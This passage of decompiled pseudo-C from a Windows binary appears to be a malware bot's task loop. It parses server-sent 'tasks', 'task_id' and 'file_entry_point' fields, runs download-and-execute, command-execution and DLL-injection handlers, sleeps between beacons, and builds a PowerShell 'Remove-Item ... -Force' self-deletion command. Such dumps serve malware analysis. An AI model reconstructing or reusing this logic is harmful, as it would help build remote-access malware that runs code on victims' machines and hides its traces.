				E00000285285C805CA80(0xc814e1e0, _t1820,  *((intOrPtr*)(_t1824 - 0x28)), ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20);
				_t1922 = _t1820;
				 *((long long*)(_t1824 - 0x28)) = _t1820;
				if ( *((short*)(_t1824 + 0xfe)) != 3) goto 0xc805b7f0;
				_t1289 =  *(_t1824 + 0xf8) & 0xffffffff;
				_t1368 = (0xc814e1e0 << 5) + _t1289;
				_t290 = _t1824 + 0x4c0; // 0x4c3
				_t291 = _t1824 + 0xf0; // 0xf3
				E00000285285C805C830(1, _t1368, _t291, _t290, _t1820, _t1824, "response_status");
				if ( *_t1289 == _t1368) goto 0xc805ab49;
				 *(_t1824 + 0x38) = _t1289;
				 *(_t1824 + 0x40) = _t1289;
				 *((short*)(_t1824 + 0x46)) = 0x405;
				_t1292 =  *(_t1824 + 0x40) & 0x00000000 | "response_status";
				 *(_t1824 + 0x40) = _t1292;
				 *(_t1824 + 0x38) = 0xf;
				_t298 = _t1824 + 0x38; // 0x3b
				_t299 = _t1824 + 0xf0; // 0xf3
				E00000285285C805CE20(_t299, _t298, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
				r12d =  *_t1292;
				 *(_t1824 + 0x9d0) = r12d;
				_t1294 =  *(_t1824 + 0xf8) & 0xffffffff;
				_t1370 = (_t1368 << 5) + _t1294;
				_t303 = _t1824 + 0x4b8; // 0x4bb
				_t304 = _t1824 + 0xf0; // 0xf3
				E00000285285C805C830(1, _t1370, _t304, _t303, _t1820, _t1824, "tasks");
				if ( *_t1294 == _t1370) goto 0xc805b0dd;
				 *(_t1824 + 0x48) = _t1294;
				 *(_t1824 + 0x50) = _t1294;
				 *((short*)(_t1824 + 0x56)) = 0x405;
				_t1297 =  *(_t1824 + 0x50) & 0x00000000 | "tasks";
				 *(_t1824 + 0x50) = _t1297;
				 *(_t1824 + 0x48) = 5;
				_t311 = _t1824 + 0x48; // 0x4b
				_t312 = _t1824 + 0xf0; // 0xf3
				E00000285285C805CE20(_t312, _t311, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
				if ( *((short*)(_t1297 + 0xe)) != 4) goto 0xc805b0dd;
				 *(_t1824 + 0x58) = _t1297;
				 *(_t1824 + 0x60) = _t1297;
				 *((short*)(_t1824 + 0x66)) = 0x405;
				 *(_t1824 + 0x60) =  *(_t1824 + 0x60) & 0x00000000 | "tasks";
				 *(_t1824 + 0x58) = 5;
				_t320 = _t1824 + 0x58; // 0x5b
				_t321 = _t1824 + 0xf0; // 0xf3
				_t798 = E00000285285C805CE20(_t321, _t320, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
				_t322 = _t1824 + 0x260; // 0x263
				E00000285285C805C4B0(_t798,  *(_t1824 + 0x60) & 0x00000000 | "tasks", _t322);
				_t1301 =  *((intOrPtr*)(_t1824 + 0x260));
				_t1812 = _t1301[2] & 0xffffffff;
				r14d =  *_t1301;
				_t1920 = (_t1918 << 4) + _t1812;
				if (_t1812 == _t1920) goto 0xc805b0d7;
				r13d = 0;
				 *(_t1824 + 0x3a0) = _t1917;
				 *(_t1824 + 0x3a8) = _t1917;
				 *(_t1824 + 0x3a8) = 0xf;
				 *(_t1824 + 0x3a0) = _t1917;
				 *((char*)(_t1824 + 0x390)) = 0;
				 *(_t1824 + 0x3c8) = _t1917;
				 *(_t1824 + 0x3d0) = _t1917;
				 *(_t1824 + 0x3d0) = 0xf;
				 *(_t1824 + 0x3c8) = _t1917;
				 *((char*)(_t1824 + 0x3b8)) = 0;
				 *(_t1824 + 0x3e8) = _t1917;
				 *(_t1824 + 0x3f0) = _t1917;
				 *(_t1824 + 0x3f0) = 0xf;
				 *(_t1824 + 0x3e8) = _t1917;
				 *((char*)(_t1824 + 0x3d8)) = 0;
				 *(_t1824 + 0x408) = _t1917;
				 *(_t1824 + 0x410) = _t1917;
				 *(_t1824 + 0x410) = 0xf;
				 *(_t1824 + 0x408) = _t1917;
				 *((char*)(_t1824 + 0x3f8)) = 0;
				if ( *((short*)(_t1812 + 0xe)) != 3) goto 0xc805b07e;
				_t1303 =  *(_t1812 + 8) & 0xffffffff;
				_t1372 = (_t1370 << 5) + _t1303;
				_t347 = _t1824 + 0x4b0; // 0x4b3
				E00000285285C805C830(1, _t1372, _t1812, _t347, _t1820, _t1824, "task_data");
				if ( *_t1303 == _t1372) goto 0xc805adb9;
				 *(_t1824 + 0x28) = _t1303;
				 *(_t1824 + 0x30) = _t1303;
				 *((short*)(_t1824 + 0x36)) = 0x405;
				_t1306 =  *(_t1824 + 0x30) & 0x00000000 | "task_data";
				 *(_t1824 + 0x30) = _t1306;
				 *(_t1824 + 0x28) = 9;
				_t354 = _t1824 + 0x28; // 0x2b
				E00000285285C805CE20(_t1812, _t354, _t1812, _t1820, _t1824, _t1920, _t1922);
				if (( *(_t1306 + 0xe) & 0x00001000) != 0) goto 0xc805ad8e;
				_t1308 =  *(_t1306 + 8) & 0xffffffff;
				if ( *_t1308 != 0) goto 0xc805ad98;
				goto 0xc805adaa;
				if ( *((char*)(_t1308 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0xc805ada0;
				_t360 = _t1824 + 0x3b8; // 0x3bb
				E00000285285C8056B10(_t1372, _t360, _t1308, _t1820, (_t1917 | 0xffffffff) + 1);
				_t1310 =  *(_t1812 + 8) & 0xffffffff;
				_t1374 = (_t1372 << 5) + _t1310;
				_t362 = _t1824 + 0x4a8; // 0x4ab
				E00000285285C805C830(1, _t1374, _t1812, _t362, _t1820, _t1824, "task");
				if ( *_t1310 == _t1374) goto 0xc805ae69;
				 *(_t1824 + 0x68) = _t1310;
				 *(_t1824 + 0x70) = _t1310;
				 *((short*)(_t1824 + 0x76)) = 0x405;
				_t1313 =  *(_t1824 + 0x70) & 0x00000000 | "task";
				 *(_t1824 + 0x70) = _t1313;
				 *(_t1824 + 0x68) = 4;
				_t369 = _t1824 + 0x68; // 0x6b
				E00000285285C805CE20(_t1812, _t369, _t1812, _t1820, _t1824, _t1920, _t1922);
				if (( *(_t1313 + 0xe) & 0x00001000) != 0) goto 0xc805ae40;
				_t1315 =  *(_t1313 + 8) & 0xffffffff;
				if ( *_t1315 != 0) goto 0xc805ae4a;
				goto 0xc805ae5a;
				if ( *((char*)(_t1315 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0xc805ae50;
				_t375 = _t1824 + 0x390; // 0x393
				E00000285285C8056B10(_t1374, _t375, _t1315, _t1820, (_t1917 | 0xffffffff) + 1);
				_t1317 =  *(_t1812 + 8) & 0xffffffff;
				_t1376 = (_t1374 << 5) + _t1317;
				_t377 = _t1824 + 0x4d0; // 0x4d3
				E00000285285C805C830(1, _t1376, _t1812, _t377, _t1820, _t1824, "task_id");
				if ( *_t1317 == _t1376) goto 0xc805aeee;
				 *(_t1824 + 0x78) = _t1317;
				 *(_t1824 + 0x80) = _t1317;
				 *((short*)(_t1824 + 0x86)) = 0x405;
				_t1320 =  *(_t1824 + 0x80) & 0x00000000 | "task_id";
				 *(_t1824 + 0x80) = _t1320;
				 *(_t1824 + 0x78) = 7;
				_t384 = _t1824 + 0x78; // 0x7b
				E00000285285C805CE20(_t1812, _t384, _t1812, _t1820, _t1824, _t1920, _t1922);
				 *((intOrPtr*)(_t1824 + 0x3b0)) =  *_t1320;
				_t1322 =  *(_t1812 + 8) & 0xffffffff;
				_t1378 = (_t1376 << 5) + _t1322;
				_t387 = _t1824 + 0x4a0; // 0x4a3
				E00000285285C805C830(1, _t1378, _t1812, _t387, _t1820, _t1824, "file_entry_point");
				if ( *_t1322 == _t1378) goto 0xc805afb9;
				 *(_t1824 + 0x88) = _t1322;
				 *(_t1824 + 0x90) = _t1322;
				 *((short*)(_t1824 + 0x96)) = 0x405;
				_t1325 =  *(_t1824 + 0x90) & 0x00000000 | "file_entry_point";
				 *(_t1824 + 0x90) = _t1325;
				 *(_t1824 + 0x88) = 0x10;
				_t394 = _t1824 + 0x88; // 0x8b
				E00000285285C805CE20(_t1812, _t394, _t1812, _t1820, _t1824, _t1920, _t1922);
				if (( *(_t1325 + 0xe) & 0x00001000) != 0) goto 0xc805af8a;
				_t1327 =  *(_t1325 + 8) & 0xffffffff;
				if ( *_t1327 != 0) goto 0xc805af94;
				goto 0xc805afaa;
				if ( *((char*)(_t1327 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0xc805afa0;
				_t400 = _t1824 + 0x3d8; // 0x3db
				_t818 = E00000285285C8056B10(_t1378, _t400, _t1327, _t1820, (_t1917 | 0xffffffff) + 1);
				_t401 = _t1824 + 0x390; // 0x393
				if (_t401 - _t1922 >= 0) goto 0xc805b039;
				_t402 = _t1824 + 0x390; // 0x393
				if (_t1820 - _t402 > 0) goto 0xc805b039;
				_t403 = _t1824 + 0x390; // 0x393
				if (_t1922 !=  *(_t1824 - 0x20)) goto 0xc805b010;
				_t409 = _t1824 - 0x30; // -45
				E00000285285C805C510(_t818 * (_t403 - _t1820), _t409);
				_t1923 =  *((intOrPtr*)(_t1824 - 0x28));
				 *((long long*)(_t1824 + 0x268)) = _t1923;
				 *((long long*)(_t1824 + 0x270)) = _t1923;
				if (_t1923 == 0) goto 0xc805b037;
				_t821 = E00000285285C805D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1923, ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f) + ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f)) * 8 << 4) +  *((intOrPtr*)(_t1824 - 0x30)),  *((intOrPtr*)(_t1824 - 0x30)), _t1900);
				goto 0xc805b073;
				if (_t1923 !=  *(_t1824 - 0x20)) goto 0xc805b050;
				_t417 = _t1824 - 0x30; // -45
				E00000285285C805C510(_t821, _t417);
				_t1924 =  *((intOrPtr*)(_t1824 - 0x28));
				_t1822 =  *((intOrPtr*)(_t1824 - 0x30));
				 *((long long*)(_t1824 + 0x270)) = _t1924;
				 *((long long*)(_t1824 + 0x268)) = _t1924;
				if (_t1924 == 0) goto 0xc805b073;
				_t422 = _t1824 + 0x390; // 0x393
				_t823 = E00000285285C805D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1924, _t422, _t1822, _t1900);
				_t1925 = _t1924 + 0x90;
				 *((long long*)(_t1824 - 0x28)) = _t1925;
				_t424 = _t1824 + 0x3f8; // 0x3fb
				_t824 = E00000285285C8056820(_t823, 0x1000, _t424);
				_t425 = _t1824 + 0x3d8; // 0x3db
				_t825 = E00000285285C8056820(_t824, 0x1000, _t425);
				_t426 = _t1824 + 0x3b8; // 0x3bb
				_t826 = E00000285285C8056820(_t825, 0x1000, _t426);
				_t427 = _t1824 + 0x390; // 0x393
				E00000285285C8056820(_t826, 0x1000, _t427);
				if (_t1812 + 0x10 != _t1920) goto 0xc805ac60;
				r12d =  *(_t1824 + 0x9d0);
				r13d = 3;
				goto 0xc805b0da;
				r14d = 0;
				if (r12d != 1) goto 0xc805b7f0;
				if (_t1822 != _t1925) goto 0xc805b201;
				r8d = E00000285285C80CAB54(_t1327 >> 3 >> 0x3f);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t996 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t1824 + 0x108) == 0) goto 0xc805b12f;
				E00000285285C805C610((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f),  *(_t1824 + 0x108));
				0xc80caea4();
				E00000285285C80C51EC(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1822);
				_t1333 =  *((intOrPtr*)(_t1824 - 0x58));
				r15d = 0x1000;
				if (_t1333 - 0x10 < 0) goto 0xc805b1a0;
				_t1522 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1333 + 1 - _t1925 < 0) goto 0xc805b19b;
				if ((_t996 & 0x0000001f) != 0) goto 0xc805b9a4;
				_t1335 =  *((intOrPtr*)(_t1522 - 8));
				if (_t1335 - _t1522 >= 0) goto 0xc805b99e;
				_t1523 = _t1522 - _t1335;
				if (_t1523 - 8 < 0) goto 0xc805b998;
				if (_t1523 - 0x27 > 0) goto 0xc805b992;
				0xc80c51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1920;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1336 =  *(_t1824 - 0x78);
				if (_t1336 - 0x10 < 0) goto 0xc805a86f;
				_t1525 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1336 + 1 - _t1925 < 0) goto 0xc805a86a;
				if ((_t996 & 0x0000001f) != 0) goto 0xc805b9bc;
				_t1338 =  *((intOrPtr*)(_t1525 - 8));
				if (_t1338 - _t1525 >= 0) goto 0xc805b9b6;
				_t1526 = _t1525 - _t1338;
				if (_t1526 - 8 < 0) goto 0xc805b9b0;
				if (_t1526 - 0x27 > 0) goto 0xc805b9aa;
				goto 0xc805a867;
				r12d = 0;
				_t450 = _t1824 + 0x98; // 0x9b
				E00000285285C8056430(__esp, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t450, _t1822 + 0x28);
				_t1816 =  *((intOrPtr*)(_t1822 + 0x18));
				if (_t1816 - 0x10 < 0) goto 0xc805b230;
				goto 0xc805b233;
				_t1382 =  *((intOrPtr*)(_t1822 + 0x10));
				_t1867 =  <  ? _t1382 : _t1917;
				_t1173 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b25b;
				if (E00000285285C80C9A30(_t996, _t1822, "shi",  <  ? _t1382 : _t1917) != 0) goto 0xc805b30e;
				if (_t1382 != 3) goto 0xc805b30e;
				r8d = 0x208;
				E00000285285C80C8EF0(_t996, 0, _t1042, __esp, 0xc81530b0, "shi", _t1816,  <  ? _t1382 : _t1917);
				E00000285285C80CAB54(_t1338);
				r9d = 0;
				_t459 = _t1900 + 0x26; // 0x26
				r8d = _t459;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t1824 + 0x1f0)) = _t1338;
				 *((long long*)(_t1824 + 0x1f8)) = _t1338;
				 *((long long*)(_t1824 + 0x200)) = _t1338;
				_t465 = _t1824 + 0x1f0; // 0x1f3
				E00000285285C8097750(_t1338, _t1382, _t465, _t1816, _t1822, _t1900);
				if ( *((intOrPtr*)(_t1824 + 0x200)) == 0) goto 0xc805b270;
				_t467 = _t1824 + 0x98; // 0x9b
				E00000285285C8057AE0(_t1338,  *((intOrPtr*)(_t1824 + 0x1f0)),  *((intOrPtr*)(_t1824 + 0x1f8)), _t467, _t1917);
				goto 0xc805b3ee;
				if (_t1816 - 0x10 < 0) goto 0xc805b319;
				goto 0xc805b31c;
				_t1870 =  <  ? _t1382 : _t1917;
				_t1179 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b340;
				if (E00000285285C80C9A30(0, _t1822, "dij",  <  ? _t1382 : _t1917) != 0) goto 0xc805b40b;
				if (_t1382 != 3) goto 0xc805b40b;
				r8d = 0x208;
				E00000285285C80C8EF0(0, 0, _t1042, __esp, 0xc81530b0, "dij", _t1816,  <  ? _t1382 : _t1917);
				_t845 = E00000285285C80CAB54(_t1338);
				r9d = 0;
				_t476 = _t1900 + 0x26; // 0x26
				r8d = _t476;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t1824 + 0x208)) = _t1338;
				 *((long long*)(_t1824 + 0x210)) = _t1338;
				 *((long long*)(_t1824 + 0x218)) = _t1338;
				_t482 = _t1824 + 0x208; // 0x20b
				E00000285285C8097750(_t1338, _t1382, _t482, _t1816, _t1822, _t1900);
				if ( *((intOrPtr*)(_t1824 + 0x218)) == 0) goto 0xc805b351;
				_t485 = _t1824 + 0x98; // 0x9b
				_t851 = E00000285285C8057CB0(_t1382,  *((intOrPtr*)(_t1824 + 0x208)),  *((intOrPtr*)(_t1824 + 0x210)), _t1822, _t1824, _t485, _t1822 + 0x48);
				r12d = 0;
				if (_t851 == 0) goto 0xc805b796;
				 *(_t1822 + 0x88) = 1;
				goto 0xc805b796;
				if (_t1816 - 0x10 < 0) goto 0xc805b416;
				goto 0xc805b419;
				_t1873 =  <  ? _t1382 : _t1917;
				_t1186 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b439;
				if (E00000285285C80C9A30(0, _t1822, "dex",  <  ? _t1382 : _t1917) != 0) goto 0xc805b4b6;
				if (_t1382 != 3) goto 0xc805b4b6;
				r9d = 0;
				r8d = _t1382 + 0x19;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				_t490 = _t1824 + 0x98; // 0x9b
				_t1763 =  >=  ?  *((void*)(_t1824 + 0x98)) : _t490;
				r8d =  *(_t1824 + 0xa8);
				if (E00000285285C809A9C8(_t1338, _t1382, 0xc81530b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490, _t1822, _t1822 + 0x48) == 0) goto 0xc805b796;
				E00000285285C809B510(_t854, 1, _t1382, 0xc81530b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490);
				 *(_t1822 + 0x88) = 1;
				goto 0xc805b796;
				if (_t1816 - 0x10 < 0) goto 0xc805b4c1;
				goto 0xc805b4c4;
				_t1875 =  <  ? _t1382 : _t1917;
				_t1193 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0xc805b4e4;
				if (E00000285285C80C9A30(0, _t1822, "sdl",  <  ? _t1382 : _t1917) != 0) goto 0xc805b501;
				if (_t1382 - 3 >= 0) goto 0xc805b4ef;
				goto 0xc805b4f9;
				if ((r12d & 0xffffff00 | _t1382 - 0x00000003 > 0x00000000) == 0) goto 0xc805bb86;
				if (E00000285285C8057E00(_t1382, _t1822, "ins") == 0) goto 0xc805b56b;
				if ( *(_t1824 + 0x9c8) == 0) goto 0xc805b52c;
				0xc8059d60();
				goto 0xc805b796;
				 *(_t1826 + 0x20) = 0;
				_t499 = _t1824 + 0x150; // 0x153
				_t500 = _t1824 + 0x1b0; // 0x1b3
				_t501 = _t1824 + 0x4f8; // 0x4fb
				_t502 = _t1824 + 0x298; // 0x29b
				if (E00000285285C8057ED0(_t845 - "dij" + "dij" * 2, 0xe1, _t1382, _t502, _t501, _t1816, _t1822, _t500, _t499, 0xc810af30) != 0) goto 0xc805b9c2;
				0xc8059d60();
				goto 0xc805b796;
				if (E00000285285C8057E00(_t1382, _t1822, "gdt") == 0) goto 0xc805b796;
				_t503 = _t1824 + 0x5b0; // 0x5b3
				E00000285285C80568F0(_t503, "\r", _t500);
				_t504 = _t1824 + 0x630; // 0x633
				E00000285285C80568F0(_t504, 0xc810cf6e, _t500);
				_t505 = _t1824 + 0x98; // 0x9b
				_t506 = _t1824 + 0x5b0; // 0x5b3
				_t507 = _t1824 + 0x630; // 0x633
				_t865 = E00000285285C80980C0(_t1338, _t1382, _t507, _t506, _t1822, _t1824, _t505, 0xc810af30, _t1917, _t1925);
				_t508 = _t1824 + 0x630; // 0x633
				_t866 = E00000285285C8056820(_t865, 0, _t508);
				_t509 = _t1824 + 0x5b0; // 0x5b3
				E00000285285C8056820(_t866, 0, _t509);
				r8b = 0xa;
				_t510 = _t1824 + 0x98; // 0x9b
				_t511 = _t1824 + 0x338; // 0x33b
				_t868 = E00000285285C809802C(_t1382, _t511, _t510);
				_t512 = _t1824 + 8; // 0xb
				_t869 = E00000285285C8056930(_t868, _t512);
				_t1383 =  *((intOrPtr*)(_t1824 + 0x338));
				_t1817 =  *((intOrPtr*)(_t1824 + 0x340));
				if (_t1383 == _t1817) goto 0xc805b778;
				asm("o16 nop [eax+eax]");
				_t515 = _t1824 + 0x350; // 0x353
				_t870 = E00000285285C8056930(_t869, _t515);
				_t516 = _t1824 + 0x2f8; // 0x2fb
				E00000285285C8056930(_t870, _t516);
				_t517 = _t1824 + 0x5f0; // 0x5f3
				E00000285285C80568F0(_t517, 0xc810cf6e, _t505);
				_t518 = _t1824 + 0x5d0; // 0x5d3
				E00000285285C80568F0(_t518, 0xc810cf6e, _t505);
				_t519 = _t1824 + 0x2f8; // 0x2fb
				 *(_t1826 + 0x20) = _t519;
				_t521 = _t1824 + 0x350; // 0x353
				_t522 = _t1824 + 0x5f0; // 0x5f3
				_t523 = _t1824 + 0x5d0; // 0x5d3
				r14b = E00000285285C808A9E0(_t845 - "dij" + "dij" * 2, 0, 0xe1, _t1042, 1, _t1383 - _t1817, _t1383, _t1383, _t523, _t1817, _t1822, _t1824, _t522, _t521, _t1920) == 0;
				_t524 = _t1824 + 0x5d0; // 0x5d3
				_t875 = E00000285285C8056820(_t874, 0, _t524);
				_t525 = _t1824 + 0x5f0; // 0x5f3
				E00000285285C8056820(_t875, 0, _t525);
				if (r14b == 0) goto 0xc805b710;
				if ( *((long long*)(_t1824 + 0x360)) == 0) goto 0xc805b710;
				_t527 = _t1824 + 0x518; // 0x51b
				E00000285285C80593D0(_t1383, _t527, "Command : ", _t1822, _t1824, _t1383, _t521);
				_t528 = _t1824 + 8; // 0xb
				_t878 = E00000285285C80588F0(0, _t1383, _t528, _t519, _t521);
				_t529 = _t1824 + 0x518; // 0x51b
				E00000285285C8056820(_t878, 0, _t529);
				_t530 = _t1824 + 8; // 0xb
				E00000285285C8056730(0xa, _t1383, _t530, _t1817);
				_t531 = _t1824 + 0x350; // 0x353
				_t532 = _t1824 + 8; // 0xb
				E00000285285C80588F0(0, _t1383, _t532, _t531, _t521);
				_t533 = _t1824 + 8; // 0xb
				_t882 = E00000285285C8056730(0xa, _t1383, _t533, _t1817);
				_t534 = _t1824 + 0x2f8; // 0x2fb
				_t883 = E00000285285C8056820(_t882, 0, _t534);
				_t535 = _t1824 + 0x350; // 0x353
				_t884 = E00000285285C8056820(_t883, 0, _t535);
				_t1384 = _t1383 + 0x20;
				if (_t1383 + 0x20 != _t1817) goto 0xc805b620;
				_t536 = _t1824 + 8; // 0xb
				E00000285285C8057DF0(_t884, _t536);
				r8d =  *(_t1824 + 0x18);
				_t538 = _t1824 + 0x318; // 0x31b
				E00000285285C8056200(__esp, _t519, _t1383 + 0x20, _t538, _t519);
				_t887 = E00000285285C8058900(0, _t1383 + 0x20, _t1822 + 0x68, _t519);
				_t540 = _t1824 + 0x318; // 0x31b
				_t888 = E00000285285C8056820(_t887, 0, _t540);
				 *(_t1822 + 0x88) = 1;
				goto 0xc805b77f;
				 *(_t1822 + 0x88) = r13d;
				_t543 = _t1824 + 8; // 0xb
				E00000285285C8056820(_t888, 0, _t543);
				_t544 = _t1824 + 0x338; // 0x33b
				_t890 = E00000285285C8057440(_t519, _t1383 + 0x20, _t544, _t1822);
				_t545 = _t1824 + 0x98; // 0x9b
				E00000285285C8056820(_t890, 0, _t545);
				_t1823 = _t1822 + 0x90;
				if (_t1823 != _t1925) goto 0xc805b210;
				0xc8059d60();
				_t546 = _t1824 + 0xf0; // 0xf3
				_t892 = E00000285285C805C460(_t546);
				_t547 = _t1824 - 0x70; // -109
				E00000285285C8056820(E00000285285C8056820(_t892, 0, _t547), 0, _t1826 + 0x70);
				r14d = 0;
				r15d = 0x1000;
				goto 0xc805a6ad;
				r8d = E00000285285C80CAB54(_t519);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t1003 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t1824 + 0x108) == 0) goto 0xc805b82f;
				E00000285285C805C610(_t1383 + 0x20,  *(_t1824 + 0x108));
				0xc80caea4();
				E00000285285C80C51EC(_t519, _t1383 + 0x20, _t1823);
				_t1340 =  *((intOrPtr*)(_t1824 - 0x58));
				r15d = 0x1000;
				if (_t1340 - 0x10 < 0) goto 0xc805b8a0;
				_t1583 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1340 + 1 - _t1925 < 0) goto 0xc805b89b;
				if ((_t1003 & 0x0000001f) != 0) goto 0xc805c08d;
				_t1342 =  *((intOrPtr*)(_t1583 - 8));
				if (_t1342 - _t1583 >= 0) goto 0xc805c087;
				_t1584 = _t1583 - _t1342;
				if (_t1584 - 8 < 0) goto 0xc805c081;
				if (_t1584 - 0x27 > 0) goto 0xc805c07b;
				0xc80c51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1920;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1343 =  *(_t1824 - 0x78);
				if (_t1343 - 0x10 < 0) goto 0xc805a86f;
				_t1586 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1343 + 1 - _t1925 < 0) goto 0xc805a86a;
				if ((_t1003 & 0x0000001f) != 0) goto 0xc805c0a5;
				_t1345 =  *((intOrPtr*)(_t1586 - 8));
				if (_t1345 - _t1586 >= 0) goto 0xc805c09f;
				_t1587 = _t1586 - _t1345;
				if (_t1587 - 8 < 0) goto 0xc805c099;
				if (_t1587 - 0x27 > 0) goto 0xc805c093;
				goto 0xc805a867;
				r8d = E00000285285C80CAB54(_t1345);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t1005 = r8d * 0x3e8;
				Sleep(??);
				goto 0xc805a6c0;
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				asm("int3");
				0xc80caadc();
				_t574 = _t1824 + 0x170; // 0x173
				E00000285285C805C440(_t1345, _t574);
				r13d =  ==  ? 1 : r13d;
				 *(_t1823 + 0x88) = r13d;
				_t576 = _t1824 + 0x170; // 0x173
				E00000285285C805C310(1, _t1383 + 0x20, _t576, _t1823);
				_t577 = _t1824 + 0x170; // 0x173
				_t1346 = _t577;
				 *(_t1826 + 0x20) = _t1346;
				_t579 = _t1824 + 0x220; // 0x223
				_t580 = _t1824 + 0x190; // 0x193
				_t581 = _t1824 + 0x1d0; // 0x1d3
				_t582 = _t1824 + 0x2b8; // 0x2bb
				_t906 = E00000285285C8093D60(_t1346, _t1383 + 0x20, _t582, _t581, _t580, _t579);
				_t583 = _t1824 + 0xd0; // 0xd3
				E00000285285C805C300(_t906, _t583,  *0xc81530a8);
				_t584 = _t1346 + 0x20; // 0x20
				 *(_t1826 + 0x20) = _t1826 + 0x50;
				_t587 = _t1824 + 0x2b8; // 0x2bb
				_t588 = _t1824 + 0x318; // 0x31b
				_t908 = E00000285285C806A7F0(_t1005, 0x28c1979 * r8d >> 0x20 >> 1, _t1042, 1, 0x28c1979 * r8d >> 0x20 >> 1 - 3, _t1383 + 0x20, _t588, _t1346, _t1817, _t1823, _t1824, _t584, _t587, _t1912);
				_t589 = _t1824 + 0x318; // 0x31b
				E00000285285C8056820(_t908, _t1005, _t589);
				_t591 = _t1824 + 0x610; // 0x613
				E00000285285C8057760(_t1346, _t591, _t587);
				_t592 = _t1824 + 0x278; // 0x27b
				E00000285285C80568F0(_t592, "powershell", _t584);
				GetCurrentProcessId();
				_t593 = _t1824 + 0x518; // 0x51b
				E00000285285C8059D20(_t593);
				_t594 = _t1824 + 0x318; // 0x31b
				E00000285285C805CA20(_t1346, _t594, _t1346);
				_t595 = _t1824 + 0x278; // 0x27b
				_t915 = E00000285285C80588F0(_t1005, _t1383 + 0x20, _t595, _t1346, _t587);
				_t596 = _t1824 + 0x318; // 0x31b
				_t916 = E00000285285C8056820(_t915, _t1005, _t596);
				_t597 = _t1824 + 0x518; // 0x51b
				_t917 = E00000285285C8056820(_t916, _t1005, _t597);
				_t598 = _t1824 + 0x278; // 0x27b
				E00000285285C80588D0(_t917, _t1005, _t1346, _t1383 + 0x20, _t598, "; Remove-Item -Path \"", _t1346, _t587);
				_t599 = _t1824 + 0x610; // 0x613
				_t600 = _t1824 + 0x278; // 0x27b
				_t919 = E00000285285C80588F0(_t1005, _t1383 + 0x20, _t600, _t599, _t587);
				_t601 = _t1824 + 0x278; // 0x27b
				_t920 = E00000285285C80588D0(_t919, _t1005, _t1346, _t1384, _t601, "\" -Force", _t1346, _t587);
				_t602 = _t1824 + 0x278; // 0x27b
				_t921 = E00000285285C80588D0(_t920, _t1005, _t1346, _t1384, _t602, "\"", _t1346, _t587);
				_t603 = _t1824 + 0x278; // 0x27b
				E00000285285C809B510(E00000285285C8057DF0(_t921, _t603), 1, _t1384, _t1346, "\"");
				__imp__CoUninitialize();
				_t924 = TerminateThread(??, ??);
				_t604 = _t1824 + 0x278; // 0x27b
				_t925 = E00000285285C8056820(_t924, _t1005, _t604);
				_t605 = _t1824 + 0x610; // 0x613
				_t926 = E00000285285C8056820(_t925, _t1005, _t605);
				_t606 = _t1824 + 0x2b8; // 0x2bb
				E00000285285C8056820(_t926, _t1005, _t606);
				_t607 = _t1824 + 0x170; // 0x173
				E00000285285C805C3D0(_t607);
				goto 0xc805bfa7;
				_t982 =  *(_t1824 + 0x9c8) & 0x000000ff;
				if (_t982 == 0) goto 0xc805bbb9;
				 *(_t1826 + 0x20) = 1;
				_t610 = _t1824 + 0x150; // 0x153
